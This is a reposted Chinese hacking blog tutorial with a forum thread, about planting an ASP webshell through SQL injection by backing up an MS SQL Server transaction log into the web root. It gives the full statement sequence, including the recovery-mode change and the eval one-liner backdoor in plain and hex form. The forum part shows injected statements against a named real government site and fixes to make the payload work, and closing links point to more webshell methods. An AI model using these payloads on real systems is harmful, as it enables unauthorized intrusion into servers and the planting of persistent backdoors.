利用log备份获取WEBSHELL

转载 2006年05月31日 11:40:00

利用log备份获取WEBSHELL

| |
[不指定 2006/04/02 20:43 | by NetKnave ]
利用log备份获取WEBSHELL

 Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看。嗯,方法流出去无所谓,文章留着吧。

 dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能够达到一些效果,但是方法比较复杂而且效果不明显。加上关于重用性的考虑,例如多次备份的成功率,backup database的方法并不太适用。这里将要讲述的是另外一个备份的方法,导出日志文件到web目录来获得shell。
 饭要一口一口的吃,技术问题也要一个一个的解决,得到webshell首先要知道物理路径,然后才能说其他的。关于物理路径的暴露有很多方法,注入也可以得到,这点nbsi2已经做到了,就不再多说。值得注意的是,如果数据库和web分离,这样肯定得不到webshell,备份出来的东西可以覆盖任何文件,一些关于开始菜单的想法还是有效的,只要注意扩展名就好。扯远了,反正如果数据库和web在一块的,你就有机会,反之还是想其他的办法吧。
 然后你要得到当前的权限和数据库名。如果是sysadmin当然没有必要做很复杂的事情,dbowner足矣,public则不行。当前打开的库名用一个db_name()就可以得到,同样很简单。
 默认的情况是,一般选择的数据库故障还原类型都是简单,这时候不能够对日志文件进行备份。然而我们都是dbowner了,还有什么不能做的呢,只要修改一下属性就可以。由于不能去企业管理器中修改,只有用一段SQL语句,很简单的,这样就可以:

alter database XXXX set RECOVERY FULL

 其中XXXX是你得到的数据库的名字,执行过后就可以备份日志了。这种修改是破坏性的,因为你不知道以前的故障还原模式是什么,细心的管理员看到异样,可能就要开始起疑心。如果之前你能得到数据库的状态,最好还是在备份完以后把这个数据库的属性改回来。

 剩下的事情就是怎样让数据库用最原始的方式记录下你的数据了。这一点和backup database中设定表名为image的问题相对应,如果你只是建立一个之类的表,日志里面的记录还是以松散的格式记录的,也就是< % % >,没有任何效果。通过实际的测试,发现还是可以通过与backup database类似的方式记录进去,如下:

create table cmd (a image)
insert into cmd (a) values ('')
backup log XXXX to disk = 'c:/xxx/2.asp'

 这样你已经得到一个webshell了。

 到这里就完了么?没有,呵呵,我们继续。
 到这里有两个分支方向,第一个,让注入的时候不出现单引号,太简单了,我都懒得写;第二个,减小这个webshell的长度以及提高成功率。下面的方法就是讨论第二个分支问题的,同样适用于backup database的减小。
 首先是初始化这个日志。

backup log XXXX to disk = 'c:/caonima' with init

 这样有点类似于增量备份的第一步,不过有点不同的是,你做了这个以后,你备份出来的可用的shell是固定的。这一点比较重要,因为有了这一步,不管管理员在数据库里面做了什么扰乱你back database的手脚,或者你之前有多少混蛋(你肯定会这么想的)弄了些你不喜欢的东西,都没有关系,甚至你做过以后,别人在后面再按照你的方法来一次,还是会成功,这对于偶尔出现的反复,比如对方机器重装但是数据库和代码没变,有不小的帮助。
 然后是调整一下backup中各个语句的顺序。通过第一点,大概的步骤已经确定下来了,那就是:

alter database XXXX set RECOVERY FULL
backup log XXXX to disk = 'c:/Sammy' with init
create table cmd (a image)
insert into cmd (a) values ('')
backup log XXXX to disk = 'c:/xxx/2.asp'

 这样不好,感觉上多了一条没用的东西。

create table cmd (a image)

 确实有点讨厌,不过这句是必要的,只好调整一下位置,弄到其他地方去。调换一下顺序似乎还可以小一点,对于backup database中的增量情况同样是可以的,backup database甚至可以仅仅在update后马上备份,不过由于涉及到了数据的存储格式,情况很复杂,这里不讨论。调整后的是:

alter database XXXX set RECOVERY FULL
create table cmd (a image)
backup log XXXX to disk = 'c:/Sammy' with init
insert into cmd (a) values ('')
backup log XXXX to disk = 'c:/xxx/2.asp'

 成功的话,备份出来的shell(上面的2.asp)有78.5k,文件长度固定的是80,384字节。很挑剔的朋友也可以接受了吧,当然用这个来生成一个干净的木马也可以——这本来就是顶端cs木马的s端,很通用的。
 进一步的,虽然不能再次缩小这个木马了,但是可以让垃圾文件少一点,那就是加上response.end,这样后面的垃圾数据就不再显示。所有的垃圾数据,你可以统计一下,大约只有6~12k,也就是说,这个数据大约在2.asp文件偏移6xxx到12xxx附近,最好的情况似乎在6k左右,而且这个概率分布比较靠前,很少见到10k以上。这还是比较令人满意的。

 目前用backup log来测试的成功率是100%,就这样分析似乎不应该有失败的情况。无论如何,这个比backup database好太多了。

[后记]

 这个备份出来的最终.asp大小仍然可能会浮动,最坏情况见过180k左右的,执行位置的偏移在30K附近,只出现过一次,再次备份的时候固定在80,384字节,不太明白原因。
 半年来使用的成功率在90%以上,出现过两次异常,都是web注射的时候,对方的身份是sysadmin,在最后一步insert的时候,报“[Microsoft][ODBC SQL Server Driver]连接占线导致另一个 hstmt”,不明白原因,也没有进一步分析(其实就是不会分析)。
技术文章 | 评论(1) | 引用(0) | 阅读(228)
NetKnave Email Homepage
2006/04/02 20:44
[讨论]log备份获取WebShell遇到的问题

议题作者:蜀山剑客
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

今天测试log备份获取WEBSEHLL遇到点问题,首先说下我自己理解通过log备份和差异备份的区别(不对和不完善的请大家指出与补充)。LOG备份得到的WEBSHELL文件小,大大增加了成功率。避免了数据库里有特殊字符备份不成功的情况。今天在测试是没成功,备份出来没有一句话马,功能失去了,也就没有任何意义了。提交上来讨论下错误之处。
由于是议题讨论。用了真实地址,请勿破坏!
心下是我的语句:
;alter database dweb set RECOVERY FULL--
;create table cmd (a image)--
;backup log dweb to disk = /'c://Sammy/' with init--
;insert into cmd (a) values (/'0x3C256576616C20726571756573742822732229253E/')--
;backup log dweb to disk = /'d://chen//s2.asp/'--
备份结果
http://www.gzii.gov.cn/s2....
十六进制形式备份出来了!
我再用如下语句!
;Drop table [cmd]--
;alter database dweb set RECOVERY FULL--
;create table cmd (a image)--
;backup log dweb to disk = /'c://Sammy/' with init--
;insert into cmd (a) values (/'<%eval request(/"s/")%>/')--
;backup log dweb to disk = /'d://chen//sssjjk.asp/'--

如果又如下
http://www.gzii.gov.cn/sss...

是何原因使LOG备份不成功呢?



问题已解决,把语句换成!
;insert into cmd (a) values (/'<%%25eval request(/"s/")%%25>/')--
确实能成功!谢谢!

;insert into cmd (a) values (/'0x3C256576616C20726571756573742822732229253E/')--
楼主的这句是写 字符串 “0x3C256576616C20726571756573742822732229253E”到文件里 而不是木马
把单引号去掉就可以了
insert into cmd (a) values (0x3C256576616C20726571756573742822732229253E)--

测试成功的log备份webshell代码

  • 2010年02月12日 18:47
  • 567B
  • 下载

【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限

考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 ...

利用未授权的redis写webshell

最近redis的话题比较多,因此就有了下面这个故事。 目标IP:210.73.90.xxx 利用漏洞:未授权的redis访问 漏洞利用1: 1)本地生成秘钥 root@GanDolf:~# ...

一键获取webShell,同时验证是不是可以连接一句话

目标:根据上一篇写的指纹录入工具,可以收集很多cms等漏洞指纹,然后运行改脚本直接获取shell,也可以作为路径扫描程序,同时含有一句话连接验证功能#coding=utf-8import reques...

在phpmyadmin后台获取webshell方法汇总整理

方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma...

Web安全之:WebShell的获取与查杀

0x00 什么是webshell 攻击者以asp、php、jsp等网页文件形式保存在Web服务器上的一种命令执行环境,也可称为网页后门。...

Redis非授权访问获取webshell及相关问题

最近,在乌云上看到有人利用Redis非授权访问获取webshell的案例。其实,之前在安全论坛上有看到相关的介绍文章。好吧,我也打算试用一把,在测试过程中把遇到的问题及解决办法记录一下。指不定有些朋友...

利用phpMyAdmin拿webshell

  • 2009年05月01日 18:44
  • 23KB
  • 下载

利用grep查找webshell

原文地址:http://www.freebuf.com/articles/4074.html grep (global search regular expression(RE) and pri...
  • nohaoye
  • nohaoye
  • 2015年07月23日 11:01
  • 337
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章: 利用log备份获取WEBSHELL
举报原因:
原因补充:

(最多只允许输入30个字)